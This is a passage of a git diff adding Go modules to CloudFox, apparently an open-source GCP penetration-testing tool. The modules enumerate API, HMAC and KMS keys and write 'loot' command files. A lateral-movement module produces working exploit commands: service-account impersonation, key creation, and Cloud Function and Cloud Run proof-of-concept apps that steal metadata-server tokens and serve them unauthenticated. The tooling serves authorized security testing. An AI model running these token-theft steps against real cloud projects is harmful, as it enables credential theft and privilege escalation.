key.ServiceAccountEmail, + DisplayName: "", + Origin: origin, + State: key.State, + CreateTime: key.TimeCreated, + Expired: false, // HMAC keys don't expire + }) + } + } + + // 3. Enumerate API Keys + apiKeysService := apikeysservice.New() + apiKeys, err := apiKeysService.ListAPIKeysWithKeyStrings(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate API keys in project %s", projectID)) + } else { + for _, key := range apiKeys { + // Extract key ID from full name + keyID := key.UID + if keyID == "" { + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + } + + state := "ACTIVE" + if !key.DeleteTime.IsZero() { + state = "DELETED" + } + + restrictions := "None" + if key.HasRestrictions { + restrictions = key.RestrictionType + if len(key.AllowedAPIs) > 0 { + restrictions = fmt.Sprintf("%s (APIs: %d)", key.RestrictionType, len(key.AllowedAPIs)) + } + } + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "API Key", + KeyID: keyID, + Owner: "Project-level", + DisplayName: key.DisplayName, + Origin: "-", + State: state, + CreateTime: key.CreateTime, + Expired: false, // API keys don't expire + Restrictions: restrictions, + KeyString: key.KeyString, + }) + } + } + + // Thread-safe append + m.mu.Lock() + m.Keys = append(m.Keys, projectKeys...) + for _, key := range projectKeys { + m.addKeyToLoot(key) + } + m.mu.Unlock() +} + +func (m *KeysModule) initializeLootFiles() { + m.LootMap["keys-hmac-s3-commands"] = &internal.LootFile{ + Name: "keys-hmac-s3-commands", + Contents: "# HMAC S3-Compatible Access Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["keys-apikey-test-commands"] = &internal.LootFile{ + Name: "keys-apikey-test-commands", + Contents: "# API Key Test Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *KeysModule) addKeyToLoot(key UnifiedKeyInfo) { + switch key.KeyType { + case "HMAC": + if key.State == "ACTIVE" { + m.LootMap["keys-hmac-s3-commands"].Contents += fmt.Sprintf( + "# HMAC Key: %s\n"+ + "# Service Account: %s\n"+ + "# Project: %s\n\n"+ + "# Configure AWS CLI with HMAC credentials:\n"+ + "aws configure set aws_access_key_id %s\n"+ + "aws configure set aws_secret_access_key \n\n"+ + "# List buckets via S3-compatible endpoint:\n"+ + "aws --endpoint-url https://storage.googleapis.com s3 ls\n\n", + key.KeyID, + key.Owner, + key.ProjectID, + key.KeyID, + ) + } + + case "API Key": + if key.KeyString != "" { + m.LootMap["keys-apikey-test-commands"].Contents += fmt.Sprintf( + "# API Key: %s (%s)\n"+ + "# Project: %s\n"+ + "# Restrictions: %s\n\n"+ + "# Test API access:\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://maps.googleapis.com/maps/api/geocode/json?address=test'\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://translation.googleapis.com/language/translate/v2?q=Hello&target=es'\n\n", + key.KeyID, + key.DisplayName, + key.ProjectID, + key.Restrictions, + key.KeyString, + key.KeyString, + ) + } + } +} + +func (m *KeysModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project ID", + "Project Name", + "Key Type", + "Key ID", + "Owner", + "Origin", + "Algorithm", + "State", + "Created", + "Expires", + "DWD", + "Restrictions", + } + + var body [][]string + for _, key := range m.Keys { + created := "-" + if !key.CreateTime.IsZero() { + created = key.CreateTime.Format("2006-01-02") + } + + expires := "-" + if !key.ExpireTime.IsZero() { + // Check for "never expires" (year 9999) + if key.ExpireTime.Year() >= 9999 { + expires = "Never" + } else { + expires = key.ExpireTime.Format("2006-01-02") + } + } + + dwd := "-" + if key.KeyType == "SA Key" { + if key.DWDEnabled { + dwd = "Yes" + } else { + dwd = "No" + } + } + + restrictions := "-" + if key.KeyType == "API Key" { + restrictions = key.Restrictions + } + + algorithm := key.Algorithm + if algorithm == "" { + algorithm = "-" + } + + body = append(body, []string{ + key.ProjectID, + m.GetProjectName(key.ProjectID), + key.KeyType, + key.KeyID, + key.Owner, + key.Origin, + algorithm, + key.State, + created, + expires, + dwd, + restrictions, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "keys", + Header: header, + Body: body, + }, + } + + output := KeysOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_KEYS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/kms.go b/gcp/commands/kms.go new file mode 100644 index 00000000..3590f14c --- /dev/null +++ b/gcp/commands/kms.go @@ -0,0 +1,426 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + KMSService "github.com/BishopFox/cloudfox/gcp/services/kmsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPKMSCommand = &cobra.Command{ + Use: globals.GCP_KMS_MODULE_NAME, + Aliases: []string{"crypto", "encryption-keys"}, + Short: "Enumerate Cloud KMS key rings and crypto keys with security analysis", + Long: `Enumerate Cloud KMS key rings and crypto keys across projects with security-relevant details. + +Features: +- Lists all KMS key rings and crypto keys +- Shows key purpose (encryption, signing, MAC) +- Identifies protection level (software, HSM, external) +- Shows rotation configuration and status +- Detects public key access via IAM +- Generates gcloud commands for key operations + +Security Columns: +- Purpose: ENCRYPT_DECRYPT, ASYMMETRIC_SIGN, ASYMMETRIC_DECRYPT, MAC +- Protection: SOFTWARE, HSM, EXTERNAL, EXTERNAL_VPC +- Rotation: Key rotation period and next rotation time +- PublicDecrypt: Whether allUsers/allAuthenticatedUsers can decrypt + +Attack Surface: +- Public decrypt access allows unauthorized data access +- Keys without rotation may be compromised long-term +- HSM vs software protection affects key extraction risk +- External keys indicate third-party key management`, + Run: runGCPKMSCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type KMSModule struct { + gcpinternal.BaseGCPModule + + KeyRings []KMSService.KeyRingInfo + CryptoKeys []KMSService.CryptoKeyInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type KMSOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o KMSOutput) TableFiles() []internal.TableFile { return o.Table } +func (o KMSOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPKMSCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_KMS_MODULE_NAME) + if err != nil { + return + } + + module := &KMSModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + KeyRings: []KMSService.KeyRingInfo{}, + CryptoKeys: []KMSService.CryptoKeyInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *KMSModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_KMS_MODULE_NAME, m.processProject) + + if len(m.CryptoKeys) == 0 { + logger.InfoM("No KMS keys found", globals.GCP_KMS_MODULE_NAME) + return + } + + // Count security-relevant metrics + hsmCount := 0 + publicDecryptCount := 0 + noRotationCount := 0 + for _, key := range m.CryptoKeys { + if key.ProtectionLevel == "HSM" { + hsmCount++ + } + if key.IsPublicDecrypt { + publicDecryptCount++ + } + if key.RotationPeriod == "" && key.Purpose == "ENCRYPT_DECRYPT" { + noRotationCount++ + } + } + + msg := fmt.Sprintf("Found %d key ring(s), %d key(s)", len(m.KeyRings), len(m.CryptoKeys)) + if hsmCount > 0 { + msg += fmt.Sprintf(" [%d HSM]", hsmCount) + } + if publicDecryptCount > 0 { + msg += fmt.Sprintf(" [%d PUBLIC DECRYPT!]", publicDecryptCount) + } + logger.SuccessM(msg, globals.GCP_KMS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *KMSModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating KMS in project: %s", projectID), globals.GCP_KMS_MODULE_NAME) + } + + ks := KMSService.New() + + // Get key rings + keyRings, err := ks.KeyRings(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_KMS_MODULE_NAME, + fmt.Sprintf("Could not enumerate KMS key rings in project %s", projectID)) + return + } + + m.mu.Lock() + m.KeyRings = append(m.KeyRings, keyRings...) + m.mu.Unlock() + + // Get crypto keys + keys, err := ks.CryptoKeys(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_KMS_MODULE_NAME, + fmt.Sprintf("Could not enumerate KMS keys in project %s", projectID)) + } else { + m.mu.Lock() + m.CryptoKeys = append(m.CryptoKeys, keys...) + for _, key := range keys { + m.addKeyToLoot(key) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d key ring(s), %d key(s) in project %s", len(keyRings), len(keys), projectID), globals.GCP_KMS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *KMSModule) initializeLootFiles() { + m.LootMap["kms-commands"] = &internal.LootFile{ + Name: "kms-commands", + Contents: "# KMS Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *KMSModule) addKeyToLoot(key KMSService.CryptoKeyInfo) { + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "## Key: %s (Project: %s, KeyRing: %s, Location: %s)\n"+ + "# Purpose: %s, Protection: %s\n", + key.Name, key.ProjectID, + key.KeyRing, key.Location, + key.Purpose, key.ProtectionLevel, + ) + + // Commands + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "\n# Describe key:\n"+ + "gcloud kms keys describe %s --keyring=%s --location=%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud kms keys get-iam-policy %s --keyring=%s --location=%s --project=%s\n"+ + "# List versions:\n"+ + "gcloud kms keys versions list --key=%s --keyring=%s --location=%s --project=%s\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + + // Purpose-specific commands + switch key.Purpose { + case "ENCRYPT_DECRYPT": + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "# Encrypt data:\n"+ + "echo -n 'secret data' | gcloud kms encrypt --key=%s --keyring=%s --location=%s --project=%s --plaintext-file=- --ciphertext-file=encrypted.bin\n"+ + "# Decrypt data:\n"+ + "gcloud kms decrypt --key=%s --keyring=%s --location=%s --project=%s --ciphertext-file=encrypted.bin --plaintext-file=-\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + case "ASYMMETRIC_SIGN": + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "# Sign data:\n"+ + "gcloud kms asymmetric-sign --key=%s --keyring=%s --location=%s --project=%s --version=1 --digest-algorithm=sha256 --input-file=data.txt --signature-file=signature.bin\n"+ + "# Get public key:\n"+ + "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + case "ASYMMETRIC_DECRYPT": + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "# Decrypt data:\n"+ + "gcloud kms asymmetric-decrypt --key=%s --keyring=%s --location=%s --project=%s --version=1 --ciphertext-file=encrypted.bin --plaintext-file=-\n"+ + "# Get public key:\n"+ + "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + } + + m.LootMap["kms-commands"].Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Crypto keys table with IAM columns - one row per IAM binding + keysHeader := []string{ + "Project Name", + "Project ID", + "Key Name", + "Key Ring", + "Location", + "Purpose", + "Protection", + "Version", + "State", + "Rotation", + "Public Encrypt", + "Public Decrypt", + "IAM Role", + "IAM Member", + } + + var keysBody [][]string + for _, key := range m.CryptoKeys { + // Format rotation + rotation := "-" + if key.RotationPeriod != "" { + rotation = formatDuration(key.RotationPeriod) + } + + // Format protection level + protection := key.ProtectionLevel + if protection == "" { + protection = "SOFTWARE" + } + + // Base row data (reused for each IAM binding) + baseRow := []string{ + m.GetProjectName(key.ProjectID), + key.ProjectID, + key.Name, + key.KeyRing, + key.Location, + formatPurpose(key.Purpose), + protection, + key.PrimaryVersion, + key.PrimaryState, + rotation, + boolToYesNo(key.IsPublicEncrypt), + boolToYesNo(key.IsPublicDecrypt), + } + + // If key has IAM bindings, create one row per binding + if len(key.IAMBindings) > 0 { + for _, binding := range key.IAMBindings { + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = binding.Role + row[len(baseRow)+1] = binding.Member + keysBody = append(keysBody, row) + } + } else { + // No IAM bindings - single row + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = "-" + row[len(baseRow)+1] = "-" + keysBody = append(keysBody, row) + } + } + + // Key rings table (summary) + keyRingsHeader := []string{ + "Project Name", + "Project ID", + "Key Ring", + "Location", + "Key Count", + } + + var keyRingsBody [][]string + for _, kr := range m.KeyRings { + keyRingsBody = append(keyRingsBody, []string{ + m.GetProjectName(kr.ProjectID), + kr.ProjectID, + kr.Name, + kr.Location, + fmt.Sprintf("%d", kr.KeyCount), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(keysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keys", + Header: keysHeader, + Body: keysBody, + }) + } + + if len(keyRingsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keyrings", + Header: keyRingsHeader, + Body: keyRingsBody, + }) + } + + output := KMSOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_KMS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatPurpose formats key purpose for display +func formatPurpose(purpose string) string { + switch purpose { + case "ENCRYPT_DECRYPT": + return "Symmetric" + case "ASYMMETRIC_SIGN": + return "Sign" + case "ASYMMETRIC_DECRYPT": + return "Asymm Decrypt" + case "MAC": + return "MAC" + default: + return purpose + } +} + +// formatDuration formats a duration string for display +func formatDuration(duration string) string { + // Duration is in format like "7776000s" (90 days) + duration = strings.TrimSuffix(duration, "s") + if duration == "" { + return "-" + } + + // Parse seconds + var seconds int64 + fmt.Sscanf(duration, "%d", &seconds) + + if seconds == 0 { + return "-" + } + + days := seconds / 86400 + if days > 0 { + return fmt.Sprintf("%dd", days) + } + + hours := seconds / 3600 + if hours > 0 { + return fmt.Sprintf("%dh", hours) + } + + return fmt.Sprintf("%ds", seconds) +} diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go new file mode 100644 index 00000000..2484a3a4 --- /dev/null +++ b/gcp/commands/lateralmovement.go @@ -0,0 +1,730 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + CloudRunService "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" + ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" + GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +// Module name constant +const GCP_LATERALMOVEMENT_MODULE_NAME string = "lateral-movement" + +var GCPLateralMovementCommand = &cobra.Command{ + Use: GCP_LATERALMOVEMENT_MODULE_NAME, + Aliases: []string{"lateral", "pivot"}, + Short: "Map lateral movement paths, credential theft vectors, and pivot opportunities", + Long: `Identify lateral movement opportunities within and across GCP projects. + +Features: +- Maps service account impersonation chains (SA → SA → SA) +- Identifies token creator permissions (lateral movement via impersonation) +- Finds cross-project access paths +- Detects VM metadata abuse vectors +- Analyzes credential storage locations (secrets, environment variables) +- Maps attack paths from compromised identities +- Generates exploitation commands for penetration testing + +This module helps identify how an attacker could move laterally after gaining +initial access to a GCP environment.`, + Run: runGCPLateralMovementCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ImpersonationChain struct { + StartIdentity string + TargetSA string + ChainLength int + Path []string // [identity] -> [sa1] -> [sa2] -> ... + RiskLevel string // CRITICAL, HIGH, MEDIUM + ExploitCommand string +} + +type TokenTheftVector struct { + ResourceType string // "instance", "function", "cloudrun", etc. + ResourceName string + ProjectID string + ServiceAccount string + AttackVector string // "metadata", "env_var", "startup_script", etc. + RiskLevel string + ExploitCommand string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LateralMovementModule struct { + gcpinternal.BaseGCPModule + + ImpersonationChains []ImpersonationChain + TokenTheftVectors []TokenTheftVector + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LateralMovementOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LateralMovementOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LateralMovementOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_LATERALMOVEMENT_MODULE_NAME) + if err != nil { + return + } + + module := &LateralMovementModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ImpersonationChains: []ImpersonationChain{}, + TokenTheftVectors: []TokenTheftVector{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Mapping lateral movement paths...", GCP_LATERALMOVEMENT_MODULE_NAME) + + // Process each project + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) + + // Check results + totalPaths := len(m.ImpersonationChains) + len(m.TokenTheftVectors) + if totalPaths == 0 { + logger.InfoM("No lateral movement paths found", GCP_LATERALMOVEMENT_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s): %d impersonation chains, %d token theft vectors", + totalPaths, len(m.ImpersonationChains), len(m.TokenTheftVectors)), GCP_LATERALMOVEMENT_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LateralMovementModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing lateral movement paths in project: %s", projectID), GCP_LATERALMOVEMENT_MODULE_NAME) + } + + // 1. Find impersonation chains + m.findImpersonationChains(ctx, projectID, logger) + + // 2. Find token theft vectors (compute instances, functions, etc.) + m.findTokenTheftVectors(ctx, projectID, logger) +} + +// findImpersonationChains finds service account impersonation paths +func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, projectID string, logger internal.Logger) { + iamService := IAMService.New() + + // Get all service accounts + serviceAccounts, err := iamService.ServiceAccounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get service accounts in project %s", projectID)) + return + } + + // For each SA, check who can impersonate it using GetServiceAccountIAMPolicy + for _, sa := range serviceAccounts { + impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + continue + } + + // Token creators can impersonate + for _, creator := range impersonationInfo.TokenCreators { + // Skip allUsers/allAuthenticatedUsers - those are handled separately + if creator == "allUsers" || creator == "allAuthenticatedUsers" { + continue + } + + chain := ImpersonationChain{ + StartIdentity: creator, + TargetSA: sa.Email, + ChainLength: 1, + Path: []string{creator, sa.Email}, + RiskLevel: "HIGH", + ExploitCommand: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", sa.Email), + } + + // If target SA has roles/owner or roles/editor, it's critical + if impersonationInfo.RiskLevel == "CRITICAL" { + chain.RiskLevel = "CRITICAL" + } + + m.mu.Lock() + m.ImpersonationChains = append(m.ImpersonationChains, chain) + m.addImpersonationChainToLoot(chain, projectID) + m.mu.Unlock() + } + + // Key creators can create persistent access + for _, creator := range impersonationInfo.KeyCreators { + if creator == "allUsers" || creator == "allAuthenticatedUsers" { + continue + } + + chain := ImpersonationChain{ + StartIdentity: creator, + TargetSA: sa.Email, + ChainLength: 1, + Path: []string{creator, sa.Email}, + RiskLevel: "CRITICAL", + ExploitCommand: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", sa.Email), + } + + m.mu.Lock() + m.ImpersonationChains = append(m.ImpersonationChains, chain) + m.addImpersonationChainToLoot(chain, projectID) + m.mu.Unlock() + } + } +} + +// findTokenTheftVectors finds compute resources where tokens can be stolen +func (m *LateralMovementModule) findTokenTheftVectors(ctx context.Context, projectID string, logger internal.Logger) { + // Find Compute Engine instances with service accounts + m.findComputeInstanceVectors(ctx, projectID, logger) + + // Find Cloud Functions with service accounts + m.findCloudFunctionVectors(ctx, projectID, logger) + + // Find Cloud Run services with service accounts + m.findCloudRunVectors(ctx, projectID, logger) + + // Find GKE clusters with node service accounts + m.findGKEVectors(ctx, projectID, logger) +} + +// findComputeInstanceVectors finds compute instances where tokens can be stolen via metadata server +func (m *LateralMovementModule) findComputeInstanceVectors(ctx context.Context, projectID string, logger internal.Logger) { + computeService := ComputeEngineService.New() + + instances, err := computeService.Instances(projectID) + if err != nil { + // Don't count as error - API may not be enabled + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get compute instances in project %s", projectID)) + } + return + } + + for _, instance := range instances { + // Skip instances without service accounts + if len(instance.ServiceAccounts) == 0 { + continue + } + + for _, sa := range instance.ServiceAccounts { + // Skip default compute SA if it has no useful scopes + if sa.Email == "" { + continue + } + + vector := TokenTheftVector{ + ResourceType: "compute_instance", + ResourceName: instance.Name, + ProjectID: projectID, + ServiceAccount: sa.Email, + AttackVector: "metadata_server", + RiskLevel: "HIGH", + ExploitCommand: fmt.Sprintf(`# SSH into instance and steal token +gcloud compute ssh %s --zone=%s --project=%s --command='curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"'`, + instance.Name, instance.Zone, projectID), + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } + } +} + +// findCloudFunctionVectors finds Cloud Functions where tokens can be stolen +func (m *LateralMovementModule) findCloudFunctionVectors(ctx context.Context, projectID string, logger internal.Logger) { + functionsService := FunctionsService.New() + + functions, err := functionsService.Functions(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get Cloud Functions in project %s", projectID)) + } + return + } + + for _, fn := range functions { + if fn.ServiceAccount == "" { + continue + } + + // Generate exploit with PoC code, deploy command, and invoke command + exploitCmd := fmt.Sprintf(`# Target: Cloud Function %s +# Service Account: %s +# Region: %s + +# Step 1: Create token exfiltration function code +mkdir -p /tmp/token-theft-%s && cd /tmp/token-theft-%s + +cat > main.py << 'PYEOF' +import functions_framework +import requests + +@functions_framework.http +def steal_token(request): + # Fetch SA token from metadata server + token_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" + headers = {"Metadata-Flavor": "Google"} + resp = requests.get(token_url, headers=headers) + token_data = resp.json() + + # Fetch SA email + email_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" + email_resp = requests.get(email_url, headers=headers) + + return { + "service_account": email_resp.text, + "access_token": token_data.get("access_token"), + "token_type": token_data.get("token_type"), + "expires_in": token_data.get("expires_in") + } +PYEOF + +cat > requirements.txt << 'REQEOF' +functions-framework==3.* +requests==2.* +REQEOF + +# Step 2: Deploy function with target SA (requires cloudfunctions.functions.create + iam.serviceAccounts.actAs) +gcloud functions deploy token-theft-poc \ + --gen2 \ + --runtime=python311 \ + --region=%s \ + --source=. \ + --entry-point=steal_token \ + --trigger-http \ + --allow-unauthenticated \ + --service-account=%s \ + --project=%s + +# Step 3: Invoke function to get token +curl -s $(gcloud functions describe token-theft-poc --region=%s --project=%s --format='value(url)') + +# Cleanup +gcloud functions delete token-theft-poc --region=%s --project=%s --quiet`, + fn.Name, fn.ServiceAccount, fn.Region, + fn.Name, fn.Name, + fn.Region, fn.ServiceAccount, projectID, + fn.Region, projectID, + fn.Region, projectID) + + vector := TokenTheftVector{ + ResourceType: "cloud_function", + ResourceName: fn.Name, + ProjectID: projectID, + ServiceAccount: fn.ServiceAccount, + AttackVector: "function_execution", + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } +} + +// findCloudRunVectors finds Cloud Run services where tokens can be stolen +func (m *LateralMovementModule) findCloudRunVectors(ctx context.Context, projectID string, logger internal.Logger) { + cloudRunService := CloudRunService.New() + + services, err := cloudRunService.Services(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get Cloud Run services in project %s", projectID)) + } + return + } + + for _, svc := range services { + if svc.ServiceAccount == "" { + continue + } + + // Generate exploit with PoC code, deploy command, and invoke command + exploitCmd := fmt.Sprintf(`# Target: Cloud Run Service %s +# Service Account: %s +# Region: %s + +# Step 1: Create token exfiltration container +mkdir -p /tmp/cloudrun-theft-%s && cd /tmp/cloudrun-theft-%s + +cat > main.py << 'PYEOF' +from flask import Flask, jsonify +import requests +import os + +app = Flask(__name__) + +@app.route("/") +def steal_token(): + # Fetch SA token from metadata server + token_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" + headers = {"Metadata-Flavor": "Google"} + resp = requests.get(token_url, headers=headers) + token_data = resp.json() + + # Fetch SA email + email_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" + email_resp = requests.get(email_url, headers=headers) + + return jsonify({ + "service_account": email_resp.text, + "access_token": token_data.get("access_token"), + "token_type": token_data.get("token_type"), + "expires_in": token_data.get("expires_in") + }) + +if __name__ == "__main__": + app.run(host="0.0.0.0", port=int(os.environ.get("PORT", 8080))) +PYEOF + +cat > requirements.txt << 'REQEOF' +flask==3.* +requests==2.* +gunicorn==21.* +REQEOF + +cat > Dockerfile << 'DOCKEOF' +FROM python:3.11-slim +WORKDIR /app +COPY requirements.txt . +RUN pip install --no-cache-dir -r requirements.txt +COPY main.py . +CMD exec gunicorn --bind :$PORT --workers 1 --threads 8 --timeout 0 main:app +DOCKEOF + +# Step 2: Build and push container +gcloud builds submit --tag gcr.io/%s/token-theft-poc --project=%s + +# Step 3: Deploy Cloud Run service with target SA (requires run.services.create + iam.serviceAccounts.actAs) +gcloud run deploy token-theft-poc \ + --image gcr.io/%s/token-theft-poc \ + --region=%s \ + --service-account=%s \ + --allow-unauthenticated \ + --project=%s + +# Step 4: Invoke service to get token +curl -s $(gcloud run services describe token-theft-poc --region=%s --project=%s --format='value(status.url)') + +# Cleanup +gcloud run services delete token-theft-poc --region=%s --project=%s --quiet +gcloud container images delete gcr.io/%s/token-theft-poc --quiet 